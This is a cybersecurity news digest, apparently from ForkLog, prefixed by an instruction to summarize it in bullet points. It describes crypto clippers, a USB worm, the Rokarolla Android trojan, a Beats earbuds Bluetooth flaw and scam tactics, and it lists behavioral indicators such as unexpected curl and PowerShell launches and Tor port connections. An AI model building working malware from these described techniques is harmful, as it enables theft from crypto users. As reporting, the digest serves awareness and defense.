USB worm targeted crypto holders; Apple fixed critical Beats Studio Buds flaw and more cybersecurity news

Author:

Using an unordered list, summarize the following article with between 4 and 8 key points.

The week’s key cybersecurity developments.

We gathered the week’s most important cybersecurity news.

A crypto clipper spread via fake reputation on GitHub and YouTube.
A USB worm self-propagated through hidden Windows shortcuts to steal cryptocurrency.
South Korean law enforcement dismantled a crypto money-laundering network for a Cambodian syndicate.
Researchers found a new Android trojan that steals cryptocurrency.

Crypto clipper spread using fake reputation on GitHub and YouTube
An unidentified attacker launched a large-scale malware campaign using legitimate marketing tactics to build a fake “reputation economy,” according to Check Point Research.
The end goal was to deploy crypto clippers disguised as trading tools in the Solana and Pump.fun ecosystems, as well as betting outcome prediction software.
Phishing page. Source: Check Point Research.
According to the researchers, the clipper is written in Rust and targets Windows and macOS. It covertly and continuously monitors the device clipboard. When a copied cryptocurrency wallet address is detected, the malware instantly swaps it for the attacker’s details, redirecting the digital assets.
To build trust with victims — mainly crypto investors and online gamblers — the hacker set up a complex cross-platform infrastructure of “Ghost Networks.” Analysts observed coordinated activity on VirusTotal: a cluster of fake accounts mass-posted positive comments and likes to falsely classify malicious files as safe.
Similar metric manipulation is used on other platforms:

GitHub and SourceForge. The attacker controls a network of accounts to cross-promote repositories. On SourceForge, the download counter was artificially inflated to 44,000 using a farm of Android devices;
YouTube. A channel with more than 91,000 subscribers advertises the software. Tutorial videos use AI voice generators and are accompanied by boosted positive comments;
Media. To legitimize the tool, the hacker uses press release distribution services (for example, EIN Presswire), whose publications are then automatically republished by partner news sites.

Check Point researchers stressed that manipulating crowdsourced platforms signals a dangerous shift in social engineering tactics. The cross-platform reputation-boosting scheme, now proven effective, could be applied to mass distribution of ransomware and more advanced infostealers.
USB worm self-propagated via hidden Windows shortcuts to steal cryptocurrency
Microsoft experts detailed a self-replicating malware campaign targeting cryptocurrency owners.
Infection triggers when a victim opens a modified .LNK shortcut file on a USB drive. Once launched, the worm silently installs additional payloads from a command server hosted in the .onion domain.
The malware scans the local system for user documents. Upon finding them, it hides the originals and replaces them with malicious shortcuts using identical filenames. As a result, the malware activates each time the user tries to open work files. For self-propagation, the worm creates a scheduled task that monitors ports. As soon as a new USB drive is inserted, it instantly copies itself to the external media.
Infection chain. Source: Microsoft.
The stealer activates only if Task Manager is not running. It connects to the command server via a built-in Tor executable and checks the clipboard every half second for sensitive data:

12- and 24-word BIP39 seed phrases;
bitcoin wallet addresses (including Legacy, P2SH, Bech32, and Taproot), as well as Ethereum, Tron, and Monero.

When a copied address is detected, the program immediately swaps it for the attacker’s. To fool the victim, the algorithm selects attacker wallets with starting characters that visually match the originals.
Beyond clipboard hijacking, every ten seconds the malware takes five screenshots and sends them to the attackers using curl. On a specific server command, it can download and execute arbitrary JavaScript on the infected machine.
This USB worm’s activity has been observed continuously since at least February. Researchers emphasized that the clearest indicators of compromise are behavioral rather than signature-based: suspicious background activity of wscript.exe and cscript.exe, unexpected launches of curl, PowerShell and cmd.exe, and unauthorized network connections to localhost:9050 (Tor’s default proxy port).
South Korean law enforcement dismantled crypto laundering network for Cambodian syndicate
Law enforcement in South Korea detained 23 suspects in a case involving money laundering for a Cambodian phishing organization, Newsis reported.
The scheme operated through a complex transaction-routing network using both domestic South Korean and overseas crypto exchanges. Investigators said that from February 2024 to April 2025 the group moved about 11.1 million USDT.
Police highlighted the vast scale of the infrastructure: roughly 11,300 different accounts were used for laundering. These transit accounts were directly linked to stolen funds totaling about $17 million obtained across 265 incidents.
Police raids seized illicit proceeds worth 650 million won (about $430,000). The operation’s active phase is not yet complete: the suspected organizer remains at large. An Interpol Red Notice has been issued for him, enabling international search and extradition.
Researchers found a new Android trojan that steals cryptocurrency
Security researchers at Zimperium discovered an Android trojan aimed at stealing cryptocurrency.
According to analysts, the Rokarolla malware supports 137 remote commands. Its toolkit can capture PIN codes, read and send SMS, manipulate the clipboard to steal digital assets, and forcibly disable the OS’s built-in protections.
The malware spreads via malicious websites masquerading as installers for popular services like TikTok and Google Chrome.
Initially, the victim downloads an app that visually imitates the Google Play Protect system component. Using this disguise, the dropper employs social engineering to trick the user into granting Accessibility permissions. Once granted, the malware deploys the main payload and immediately disables the real Play Protect scanner.
Rokarolla requesting additional permissions. Source: Zimperium.
Rokarolla downloads fake HTML login pages from its server for each active app on its target list. When the victim opens a legitimate crypto wallet, the trojan instantly overlays it with a fake window and captures all entered credentials.
An additional overlay precisely imitates the standard Android lock screen. This allows the malware to steal the PIN, password, or pattern, giving operators control of the smartphone even when it is locked. To steal cryptocurrency, the trojan uses a built-in clipper that silently monitors the clipboard and replaces copied wallet addresses with the attackers’ details, redirecting transactions.
To bypass two-factor authentication, Rokarolla reads all SMS on the device and can send messages itself, intercepting one-time banking codes. By setting itself as the default app for calls and SMS, the trojan can block incoming calls — meaning a warning call from a bank anti-fraud system may never reach the victim.
Experts emphasized that the main protection against such threats is heightened caution when granting Accessibility permissions, as they trigger the entire attack chain.
Crypto scammers used couriers to collect cash
Attackers have begun hiring couriers to collect funds from victims whose transactions are blocked by bank security systems. The FBI reported the new tactic used by “pig butchering” crypto schemes in a public service announcement.
These scams usually start when fraudsters contact potential victims via social networks, dating sites, and messengers, build trust, and then lure them into fake investment schemes.
After convincing the victim to withdraw cash (for example, under the pretext of a temporary account “freeze”), scammers send a courier to collect it. Identification is done using a prearranged password or the serial number of a specific dollar bill. After receiving the money, the scammers simulate an increase in the victim’s virtual wallet balance and restart the cycle, demanding new payments to cover fictional “withdrawal taxes.”
According to FBI data for 2025, cryptocurrency and investment fraud remains “the most devastating form” of cybercrime in the United States, accounting for 49% of all incidents with total losses of $8.6 billion.
Vulnerability in wireless earbuds let hackers eavesdrop on iPhone users
Apple released a firmware update for Beats Studio Buds wireless earbuds that fixes a high-severity vulnerability.
The flaw, reported by SentinelOne in January, allowed attackers to connect to the device covertly and use the built-in microphone for espionage.
Tracked as CVE-2025-20701, the issue stems from improper authorization in a Bluetooth audio SDK from chipmaker Airoha. The defect lets an attacker within Bluetooth range remotely connect their equipment to the earbuds without the user’s knowledge or consent — provided the headset is not yet paired and is actively seeking connections. The vulnerability has been addressed in Beats firmware version 1B211.
According to researchers, the exploit can be triggered over standard Bluetooth or the low-energy protocol (BLE) without any authentication. Beyond eavesdropping, the attack gives near-complete control over the device: it allows reading and rewriting the earbuds’ RAM and flash memory. Attackers can also hijack established trust relationships with previously paired smartphones, enabling more complex multi-stage attacks.
Also on ForkLog:

An outdated contract on the Aztec network was hacked for $2 million.
Kentucky, following other states, filed a lawsuit against Polymarket.
The UK will ban social networks for children under 16.
Russia’s Supreme Court recognized cryptocurrency as an object of theft.
Bitbank threatened blocks over transactions related to Polymarket.

What to read this weekend?
Ideas that change the world almost always emerge on the periphery — among people their contemporaries consider eccentrics. In a new ForkLog feature, we explore why pioneers like Jack Parsons often remain in the shadow of the revolutions they sparked.

Follow ForkLog on social media

Found a mistake in the text? Select it and press CTRL+ENTER